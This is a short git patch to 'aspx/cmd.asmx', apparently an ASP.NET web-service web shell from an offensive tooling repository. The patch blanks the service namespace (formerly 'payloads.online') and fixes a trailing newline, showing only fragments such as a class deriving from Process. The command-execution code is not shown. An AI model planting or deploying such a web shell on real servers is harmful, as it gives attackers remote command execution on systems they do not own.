From 186312af8c0a0eb897b83179137d750a556854a5 Mon Sep 17 00:00:00 2001 From: Rvn0xsy Date: Wed, 31 Aug 2022 14:46:30 +0800 Subject: [PATCH] Update --- aspx/cmd.asmx | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/aspx/cmd.asmx b/aspx/cmd.asmx index d97ef0c..9caf260 100644 --- a/aspx/cmd.asmx +++ b/aspx/cmd.asmx @@ -31,7 +31,7 @@ using System.Web.Services; using System.Xml; using System.Web.Services.Protocols; -[WebService(Namespace = "http://www.payloads.online/")] +[WebService(Namespace = "")] [WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)] public class New_Process :Process @@ -81,4 +81,4 @@ public class Service : System.Web.Services.WebService HttpContext.Current.Response.End(); return R; } -} \ No newline at end of file +}